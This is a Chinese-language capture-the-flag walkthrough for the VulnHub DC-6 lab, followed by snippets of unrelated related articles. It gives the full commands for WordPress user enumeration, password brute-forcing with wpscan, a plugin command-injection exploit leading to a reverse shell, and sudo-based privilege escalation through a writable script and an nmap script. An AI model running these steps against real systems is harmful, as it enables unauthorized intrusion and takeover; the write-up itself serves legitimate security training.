靶场练习第十四天~vulnhub靶场之dc-6

一、准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

1.靶场环境

下载链接: 百度网盘 请输入提取码 提取码: bazx

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

命令:sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)扫描靶机开放的端口及其服务

nmap -sV -p- 192.168.101.119

(2)看看详细信息

nmap -A -p- 192.168.101.119

2.网站的信息收集

(1)访问靶机的网站

1.先从80端口寻找突破口,访问一下http://192.168.101.119 ,发现URL栏写的不是靶机的ip,而是http://wordy/,而很明显,DNS没有解析出来

2.回过头来注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件

(2)配置hosts文件

1.sudo vim /etc/hosts ;在文件添加:192.168.101.115(靶机ip) wordy

2.再次访问http://192.168.101.115

没有发现啥有用信息,只是知道这个是一个WordPress网站

(3)用wpscan工具看看这个靶机网站有什么用户

wpscan --url http://wordy --enumerate u

发现了几个用户

(4)用dirb扫描看看网站的后台登录是哪个网址

dirb http://wordy

1.打开http://wordy/wp-admin/ ,发现登录网址

(5)wpscan字典爆破

1.在桌面创建一个wordy-pass1.dic文件

2.将rockyou.txt里面的密码复制到wordy-pass1.dic

cd /usr/share/wordlists/

ls

cp rockyou.txt /home/kali/桌面/wordy-pass1.dic

3.将刚才得到的用户放在文件user.txt

vim user.txt

cat user.txt

3.使用wpscan进行密码爆破

常规的方法跑太费时间,把一部分密码拿出来跑

cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-pass1.dic

wpscan --ignore-main-redirect --url http://wordy -U user.txt -P wordy-pass1.dic --force

得出Username: mark, Password: helpdesk01

用爆破出来的用户密码登录

成功登录到网站后台

(6)使用mark用户登录后台,发现一个插件Activity monitor,猜测这个插件存在漏洞

1.searchsploitg工具查看Activity monitor漏洞

searchsploit Activity monitor

发现是命令注入漏洞

(1)修改html代码action跳转及shell反弹IP地址到kali本机

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html

cp 45274.html 45274.html.bak

vim 45274.html

(2)Kali临时开启HTTP服务,并访问45274.html页面

python -m SimpleHTTPServer 80

同时在kali终端这边开启监听9999端口,在页面点击submit request后,反弹shell成功

(3)优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

三、提权

1. 进入到mark用户的家目录下,stuff文件下有一个things-to-do.txt文件,查看文件内容发现graham用户及登录密码

cd /home/mark/stuff

ls

cat things-to-do.txt

2.用得到的用户密码ssh远程登录

ssh graham@192.168.101.119

3. graham用户成功登录后,查看当前用户可以执行的操作

sudo -l

发现可以运行jens用户下面的backups.sh

4.查看backups.sh

cd /home/jens

ls

cat backups.sh

5. 在backups.sh文件中写入/bin/bash,并以jens用户去执行该脚本

echo "/bin/bash" >> backups.sh

sudo -u jens ./backups.sh

6.获得jens用户权限时,查看jens用户可执行的操作

sudo -l

发现jens用户可以在无密码状态下使用nmap命令

7. 发现flag

写入一条命令到getShell,并通过nmap运行getShell成功进入root用户,在/root目录下找到theflag.txt文件

echo 'os.execute("/bin/sh")' > getShell

sudo  nmap  --script=getShell

cd /root

cat theflag.txt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375042.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

最短路径Dijkstra算法和Floyd算法整理、

转载自:http://www.cnblogs.com/biyeymyhjob/archive/2012/07/31/2615833.html 最短路径—Dijkstra算法和Floyd算法 Dijkstra算法 1.定义概览 Dijkstra(迪杰斯特拉)算法是典型的单源最短路径算法,用于计算一个节点到其他所有节点的最短路径。主要特点是以…

Java Script 中 ==(Equal) 和 === (Identity Equal) 的区别和比较算法逻辑

判断两个变量是否相等在任何编程语言中都是非常重要的功能。 JavaScript 提供了 和 两种判断两个变量是否相等的运算符,但我们开始学习的时候 JavaScript 的时候,就被一遍又一遍的告知: 要求变量的类型和值均相等,才能返回true…

靶场练习第十五天~vulnhub靶场之dc-7

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-7.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1&…

靶场练习第十六天~vulnhub靶场之dc-8

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-8.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1&…

【SpringMVC】SpringMVC系列4之@RequestParam 映射请求参数值

4、RequestParam 映射请求参数值 4.1、概述 Spring MVC 通过分析处理方法的签名,将 HTTP 请求信息绑定到处理方法的相应人参中。Spring MVC 对控制器处理方法签名的限制是很宽松的,几乎可以按喜欢的任何方式对方法进行签名。必要时可以对方法及方法入…

Sprint3

进展:今天主要是各自熟悉安卓应用开发平台,设计了图标,没什么实际上的进展。 燃尽图: 团队工作照: 转载于:https://www.cnblogs.com/XJXYJ/p/4495810.html

靶场练习第十七天~vulnhub靶场之dc-9

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1&am…

Linux内核分析 02

二,操作系统是如何工作的 1、函数调用堆栈 三大法宝:存储程序计算机 函数调用堆栈 中断机制 堆栈:是C语言程序运行时必须的一个记录调用路径和参数的空间。是计算机内部现成的东西,我们直接使用。 包括函数调用框架、传递参数、保…

靶场练习第十八天~vulnhub靶场之hackableII

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Hackable: II ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开…

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

一、环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二、信息收集 1.nmap命令扫描靶机 先用ifconfig查看kali的IP,因为kali和靶机都是NAT模式下,所以用 nmap 192.168…

spring mvc 多线程并发

ThreadLocal为解决多线程程序的并发问题提供了一种新的思路。使用这个工具类可以很简洁地编写出优美的多线程程序。 http://www.xuebuyuan.com/1628190.html 我们知道Spring通过各种DAO模板类降低了开发者使用各种数据持久技术的难度。这些模板类都是线程安全的,也就…

靶场练习第十九天~vulnhub靶场之GreenOptic: 1

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开…

靶场练习第二十五天~vulnhub靶场之Raven-2

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的…

每天一个linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics(虚拟内存统计)的缩写,可对操作系统的虚拟内存、进程、CPU活动进行监控。他是对系统的整体情况进行统计,不足之处是无法对某个进程进行深入分析。vmstat 工具提供了一种低开销的系统性能观察方…

用TypeScript开发了一个网页游戏引擎,开放源代码

最开始学习电脑编程的原动力之一就是想自己编写游戏,一方面很好奇这些游戏是怎么做出来的,另一方面觉得有些地方设计的不合理,希望电脑游戏既能让人玩的有趣,又不浪费时间。 学校五年,毕业十年,学用了十多种…

靶场练习第二十一天~vulnhub靶场之Momentum-1

一、环境搭建 1.ifconfig查看kali的ip 2.创建靶机 靶机下载地址:Momentum: 1 ~ VulnHub 二、信息收集 1.nmap命令 寻找靶机ip:nmap 192.168.101.0/24 2.端口扫描 使用命令:nmap -A -T4 -p 1-65535 192.168.101.113,发现开放2…

靶场练习第二十二天~vulnhub靶场之Momentum-2

一、准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议:nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster,寻找隐藏的网站 gobuster di…

索引深入浅出(8/10):覆盖索引或列包含

在索引深入浅出:非聚集索引的B树结构在聚集表里,在聚集表里,我们看到非聚集索引的叶子层只包含非聚集索引键和聚集索引键。从聚集表结构或堆表结构里拿到剩下列,SQL Server需要进行书签/键查找操作。很多情况下书签或键查找非常消…

靶场练习第二十三天~vulnhub靶场之GOATSELINUX: 1

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机…

靶场练习第二十四天~vulnhub靶场之Raven-1

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的…